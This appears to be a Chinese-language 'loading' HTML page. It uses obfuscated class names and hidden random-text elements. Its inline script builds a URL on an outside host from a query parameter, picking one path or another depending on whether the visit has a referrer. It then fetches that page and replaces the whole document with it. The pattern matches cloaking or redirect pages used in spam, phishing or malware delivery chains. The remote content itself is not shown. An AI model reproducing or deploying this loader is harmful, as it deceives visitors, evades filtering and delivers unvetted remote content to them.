<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ARWIlYE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ARWIlYE .RNXfIhiKOU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ARWIlYE .content {
            line-height: 50px;
            text-align: center
        }

        .ARWIlYE .img {
            width: 100%
        }

        .ARWIlYE .P31fPrG {
            text-align: center
        }

        .ARWIlYE .P31fPrG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ARWIlYE .P31fPrG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ARWIlYE .P31fPrG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ARWIlYE .P31fPrG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ARWIlYE .P31fPrG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ARWIlYE .P31fPrG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ARWIlYE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function sv6WlvZiEz7z(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rVKBlK = sv6WlvZiEz7z('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rVKBlK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rVKBlK +".html?a=share";
		}
		
        jAujw2094=url+"#"+new Date().getTime();
        jAujw2094 && function() {
            $.get(jAujw2094, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>ScT0PEKOcgWYdX4fRZJz1SC2MHfPqAvlVIgeJUxs2NAsLrwHTuJEuwJ7Iv82F7uCKm</div>
<h1 style='display:none' >hGLg3lksDk78Ny6t1PSWE3kWt7qaEQqXMguxJeYNEVC97EvH7YNUn2S7IXtaSLW4RwQIdhXtVrUr</h1>
<b style='display:none' >TR37cSvhyGpqswm67glygw0y2ojxD2laAg0qt92CdlM27pxhj0KmKdOwqrhmLiTpNedmoIUrWA2HgoH4Cy99c</b>
<ul style='display:none' >LOlueIZpZoyuTFTB7bSwRvHhGwPw4yWxnE05ZTSW0wS6nu3st5ZHuar</ul>
<img  src='' style='display:none'>
<div style='display:none'>ScT0PEKOcgWYdX4fRZJz1SC2MHfPqAvlVIgeJUxs2NAsLrwHTuJEuwJ7Iv82F7uCKm</div>
<div style='display:none'>ScT0PEKOcgWYdX4fRZJz1SC2MHfPqAvlVIgeJUxs2NAsLrwHTuJEuwJ7Iv82F7uCKm</div>
<span style='display:none'>H1dIlf5GMGbo68X</span><div class="ARWIlYE">
    <div class="RNXfIhiKOU">
        <div class="P31fPrG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >FIHXjs82SchK</b>
<span style='display:none'>vjo59Y5lfwMEMxyQeZblaPdADPB7q0y5ARa0T6aY9pLG9gRthatqzoJXhEWq6HT9X2pKbKN8QCcm</span>
<h1 style='display:none' >HlrQQHkStAoCOc71AMjurm8QkRUskWgpDajPmUbm7vtUwOcu6y22KWZGn7KqAP56IKjxu7i8SXMLAlLUIwSQ</h1></body>
</html>